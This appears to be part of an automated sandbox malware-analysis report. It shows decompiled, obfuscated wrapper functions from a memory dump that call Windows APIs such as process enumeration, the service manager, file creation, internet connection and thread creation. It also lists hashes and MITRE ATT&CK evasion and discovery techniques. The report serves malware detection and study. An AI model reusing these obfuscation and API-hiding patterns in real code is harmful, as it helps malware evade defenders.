				intOrPtr _v36;
				void* _t40;
				int _t49;
				void* _t51;
				void* _t54;

				_push(_a8);
				_t54 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00EC2523(_t40);
				_v36 = 0x141422;
				asm("stosd");
				_push(0x9c9047d0);
				asm("stosd");
				_push(__ecx);
				_push(0xb41b9fb1);
				_push(__ecx);
				asm("stosd");
				_v20 = 0x6e8e4;
				_v20 = _v20 << 1;
				_push(__ecx);
				_t51 = 0x1c;
				_v20 = _v20 * 0x65;
				_v20 = _v20 ^ 0x05792b89;
				_v8 = 0x17694a;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 + 0x7593;
				_v8 = _v8 + 0x3dc6;
				_v8 = _v8 ^ 0x000c8dea;
				_v16 = 0x6183ab;
				_v16 = _v16 << 3;
				_v16 = _v16 | 0x753fc9cb;
				_v16 = _v16 ^ 0x773f8770;
				_v12 = 0x2bda5d;
				_v12 = _v12 + 0xffff2e51;
				_v12 = _v12 ^ 0x7ae43c2f;
				_v12 = _v12 ^ 0x7acc85af;
				E00EA2309(_t51);
				_t49 = Process32NextW(_t54, _a8); // executed
				return _t49;
			}

0x00eba4a8
0x00eba4ab
0x00eba4ad
0x00eba4b1
0x00eba4b2
0x00eba4b7
0x00eba4c6
0x00eba4c7
0x00eba4cc
0x00eba4cd
0x00eba4ce
0x00eba4d3
0x00eba4d4
0x00eba4d5
0x00eba4dc
0x00eba4e3
0x00eba4e6
0x00eba4e7
0x00eba4ea
0x00eba4f1
0x00eba4f8
0x00eba4fc
0x00eba503
0x00eba50a
0x00eba511
0x00eba518
0x00eba51c
0x00eba523
0x00eba52a
0x00eba531
0x00eba538
0x00eba53f
0x00eba552
0x00eba55e
0x00eba565

APIs

Process32NextW.KERNEL32(00000000,773F8770,?,?,?,?,?,?,?,?,00000000), ref: 00EBA55E

Strings

/<z, xrefs: 00EBA538

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: NextProcess32
String ID: /<z
API String ID: 1850201408-2186077011
Opcode ID: ee7739c6ebbc081d39b179a51fe32828a234b3ca8a11d0ef1921ab7f81e9d2f1
Instruction ID: 92e29e32a458823afcb08b0713842012a452091b6d30e653f748f2f64d299926
Opcode Fuzzy Hash: ee7739c6ebbc081d39b179a51fe32828a234b3ca8a11d0ef1921ab7f81e9d2f1
Instruction Fuzzy Hash: 16215675C01219FBDF08CF95C80A8DEBBB4FB44314F108589E418B6250D3B95B459F90

Uniqueness

Uniqueness Score: -1.00%

Function 00EAE0A2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 00EAE168

Strings

|p, xrefs: 00EAE0FA

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: InfoNativeSystem
String ID: |p
API String ID: 1721193555-2455131449
Opcode ID: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction ID: 96a0c5a82a87dac8f3d7ee192cecb7c739743d8fb56875265009d79f6ffb584b
Opcode Fuzzy Hash: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction Fuzzy Hash: F92135B6D00309EFDB48DFA4C84A8EEBBB4FB45310F108599E415AA291E3B85B50CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00EBFE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00EBFE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E00EC2523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E00EA2309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

0x00ebfea4
0x00ebfea9
0x00ebfeaa
0x00ebfead
0x00ebfeb1
0x00ebfeb2
0x00ebfeb7
0x00ebfec1
0x00ebfec8
0x00ebfecb
0x00ebfed2
0x00ebfed9
0x00ebfee0
0x00ebfee7
0x00ebfeee
0x00ebfef5
0x00ebfefc
0x00ebff03
0x00ebff0a
0x00ebff11
0x00ebff18
0x00ebff1c
0x00ebff2f
0x00ebff35
0x00ebff3a
0x00ebff3b
0x00ebff3e
0x00ebff3f
0x00ebff4c
0x00ebff52

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00EB5191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 00EBFF4C

Strings

OMk, xrefs: 00EBFEC1

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: 74242f9bcdb75e6dbdbe93217909bb3301a6c0c46dcb3705b6e4348f3ba73c87
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: 671113B2C0021CABDB15EFA5D90A8EFBFB4EF45318F108088E9147A201D3B95B189B91

Uniqueness

Uniqueness Score: -1.00%

Function 00EB199D, Relevance: 1.6, APIs: 1, Instructions: 71
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00EB199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E00EC2523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E00EA2309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}

0x00eb19a6
0x00eb19a7
0x00eb19aa
0x00eb19ad
0x00eb19b0
0x00eb19b3
0x00eb19b6
0x00eb19b9
0x00eb19bc
0x00eb19bf
0x00eb19c3
0x00eb19c4
0x00eb19c9
0x00eb19d3
0x00eb19d9
0x00eb19dd
0x00eb19e4
0x00eb19eb
0x00eb19f2
0x00eb19fe
0x00eb1a03
0x00eb1a0b
0x00eb1a13
0x00eb1a16
0x00eb1a1d
0x00eb1a30
0x00eb1a38
0x00eb1a3f
0x00eb1a4a
0x00eb1a4d
0x00eb1a60
0x00eb1a79
0x00eb1a7f

APIs

CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 00EB1A79

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: 60a92b70638be7588516268fd499ec904f4d478fb93a033a08dfd9c80234095c
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: 6E21E27280021DBBDF05DF95D9098DEBFB6EF49354F108188FA1466260D3B69A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 00EC30FB, Relevance: 1.6, APIs: 1, Instructions: 70
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00EC30FB(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, void* _a24, intOrPtr _a32, intOrPtr _a36, signed int _a40, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t57;
				signed int _t58;
				short _t63;

				_t63 = _a40;
				_push(_a48);
				_push(0);
				_push(_t63 & 0x0000ffff);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E00EC2523(_t63 & 0x0000ffff);
				_a40 = 0x441dde;
				_a40 = _a40 | 0xef6c71fd;
				_a40 = _a40 + 0xffff46ca;
				_a40 = _a40 ^ 0xef65f1b7;
				_v16 = 0x4e992b;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xa64ff1a5;
				_v12 = 0xdc7938;
				_t58 = 0x71;
				_v12 = _v12 / _t58;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x00369a6d;
				_v8 = 0xc2c26;
				_v8 = _v8 << 7;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x30b97202;
				E00EA2309(0x185, _t58, _t58, 0x3cfe7f69, _t58, 0xc0cf1a4);
				_t57 = InternetConnectW(_a24, _a4, _t63, 0, 0, _a16, 0, 0); // executed
				return _t57;
			}

0x00ec3102
0x00ec3106
0x00ec310e
0x00ec310f
0x00ec3110
0x00ec3113
0x00ec3116
0x00ec3117
0x00ec311a
0x00ec311d
0x00ec3120
0x00ec3123
0x00ec3126
0x00ec3129
0x00ec312a
0x00ec312b
0x00ec3130
0x00ec313a
0x00ec3143
0x00ec314a
0x00ec3151
0x00ec3158
0x00ec315c
0x00ec3163
0x00ec316f
0x00ec3177
0x00ec317a
0x00ec317e
0x00ec3185
0x00ec318c
0x00ec3190
0x00ec3194
0x00ec31b4
0x00ec31ca
0x00ec31d1

APIs

InternetConnectW.WININET(?,00369A6D,?,00000000,00000000,?,00000000,00000000), ref: 00EC31CA

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction ID: a2eebba6b880fff0f9a0c10471dc95e34b9127ebcf495ead81361bbb284b84a1
Opcode Fuzzy Hash: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction Fuzzy Hash: 47214A76900108BBDF01CFA6CD49CDFBFB9EB89704F018149F91466220C3759A20DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB38CA, Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00EB38CA(void* __ecx, intOrPtr _a8, _Unknown_base(*)()* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t44;
				void* _t54;
				signed int _t56;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E00EC2523(_t44);
				_v8 = 0x81d8e3;
				_v8 = _v8 | 0x29cc6377;
				_t56 = 0x4e;
				_v8 = _v8 / _t56;
				_v8 = _v8 + 0xffff28cb;
				_v8 = _v8 ^ 0x008a8115;
				_v20 = 0x37a592;
				_v20 = _v20 | 0x4431b854;
				_v20 = _v20 ^ 0x44318d0b;
				_v16 = 0x83d7ad;
				_v16 = _v16 | 0x0c5d9c08;
				_v16 = _v16 ^ 0x0cde7e94;
				_v12 = 0xac61ec;
				_v12 = _v12 + 0xffff443d;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x0cbd13a0;
				E00EA2309(0x347, _t56, _t56, 0x49f4d21, _t56, 0x9c9047d0);
				_t54 = CreateThread(0, 0, _a12, _a16, 0, 0); // executed
				return _t54;
			}

0x00eb38d1
0x00eb38d6
0x00eb38d7
0x00eb38da
0x00eb38db
0x00eb38de
0x00eb38e1
0x00eb38e4
0x00eb38e7
0x00eb38ea
0x00eb38eb
0x00eb38ed
0x00eb38f2
0x00eb38fc
0x00eb390a
0x00eb3912
0x00eb3915
0x00eb391c
0x00eb3923
0x00eb392a
0x00eb3931
0x00eb3938
0x00eb393f
0x00eb3946
0x00eb394d
0x00eb3954
0x00eb3967
0x00eb396f
0x00eb3982
0x00eb3994
0x00eb399a

APIs

CreateThread.KERNEL32(00000000,00000000,44318D0B,?,00000000,00000000), ref: 00EB3994

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction ID: f493b78d2ae2439f4060c078c98d38ae6d7a8ea35925c3f2adebde4ca2208892
Opcode Fuzzy Hash: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction Fuzzy Hash: 7921E271801219BBCF15DFE9DD4A8DFBFB9FF09214F118188F919A6120D3B19A259FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2985, Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00EA2985(long __ecx, long __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t43;
				void* _t53;
				signed int _t55;
				long _t60;
				long _t61;

				_push(_a12);
				_t60 = __edx;
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00EC2523(_t43);
				_v20 = 0x610f25;
				_v20 = _v20 ^ 0x98bdb346;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x13199c72;
				_v16 = 0x24641b;
				_t55 = 0x72;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0xfebd96de;
				_v16 = _v16 ^ 0xf931a9e3;
				_v12 = 0x6331a9;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x0006f398;
				_v8 = 0x8145a8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x8268;
				_v8 = _v8 ^ 0x0405b518;
				E00EA2309(_t55 + 0x5d, _t55, _t55, 0x9d19c04e, _t55, 0x9c9047d0);
				_t53 = RtlAllocateHeap(_a8, _t60, _t61); // executed
				return _t53;
			}

0x00ea298d
0x00ea2990
0x00ea2992
0x00ea2994
0x00ea2997
0x00ea299a
0x00ea299b
0x00ea299c
0x00ea29a1
0x00ea29ab
0x00ea29b4
0x00ea29b8
0x00ea29bf
0x00ea29cc
0x00ea29d3
0x00ea29d6
0x00ea29dd
0x00ea29e4
0x00ea29eb
0x00ea29f9
0x00ea29fc
0x00ea2a03
0x00ea2a0a
0x00ea2a0e
0x00ea2a12
0x00ea2a19
0x00ea2a31
0x00ea2a3e
0x00ea2a45

APIs

RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 00EA2A3E

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction ID: 8a0784c472ffbb0af36f75a56955031ff9894062a7d0c6ea283a9008cd588951
Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction Fuzzy Hash: FC213372D00209BBDF18DFA9D84A8DEBFB5FB41714F108098E825A6210E3B5AB55DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00EB7708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00EB77B6

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: b0bb037ff50f5a6e1c78f3182a208c89fad74b83554c5d4af8280a3af004a622
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: 891134B2D00209BBDF08DFA4C94A9AEBBB4FF44304F108189E915AB251E3B19B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 00EBA566, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00EBA566(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t31;
				int _t39;

				_push(_a4);
				_push(__ecx);
				E00EC2523(_t31);
				_v20 = 0xa80c31;
				_v20 = _v20 * 0x6c;
				_v20 = _v20 ^ 0x46e6f799;
				_v16 = 0x35d7e6;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xbafefac0;
				_v12 = 0x55f9ae;
				_v12 = _v12 + 0xffffbfa6;
				_v12 = _v12 | 0xf8d2795e;
				_v12 = _v12 ^ 0xf8daa7f9;
				_v8 = 0xe46cfe;
				_v8 = _v8 ^ 0xeb94df75;
				_v8 = _v8 | 0xf69b0666;
				_v8 = _v8 ^ 0xfffa92dc;
				E00EA2309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
				_t39 = FindCloseChangeNotification(_a4); // executed
				return _t39;
			}

0x00eba56c
0x00eba570
0x00eba571
0x00eba576
0x00eba58a
0x00eba58d
0x00eba594
0x00eba59b
0x00eba59f
0x00eba5a6
0x00eba5ad
0x00eba5b4
0x00eba5bb
0x00eba5c2
0x00eba5c9
0x00eba5d0
0x00eba5d7
0x00eba5f6
0x00eba601
0x00eba606

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 00EBA601

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: 4c14cd5a2c7f188bcf4947c75a8ca6869fcdcd1650a92c84d6e09476bf31654f
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: AB11F7B5C1030DFBCF18DFE8D84699EBBB4EF44304F108598A855B6261D3756B158F91

Uniqueness

Uniqueness Score: -1.00%

Function 00EB17CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00EB17CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00EC2523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E00EA2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x00eb17d2
0x00eb17d5
0x00eb17d7
0x00eb17db
0x00eb17dc
0x00eb17e1
0x00eb17e8
0x00eb17f1
0x00eb17f8
0x00eb17ff
0x00eb1803
0x00eb1807
0x00eb180e
0x00eb181b
0x00eb1822
0x00eb1825
0x00eb182c
0x00eb1833
0x00eb1844
0x00eb1847
0x00eb1859
0x00eb185c
0x00eb1863
0x00eb186a
0x00eb186e
0x00eb1881
0x00eb188d
0x00eb1893

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 00EB188D

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 1b6a2120f4128424a96d0e6d7f8fa199591d62252bf983b8fb01e1b9dbad2227
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 892113B5D0020DFBDB08DFA4C94A9EEBBB4EB45304F20818DE525B7240E3B56B049FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

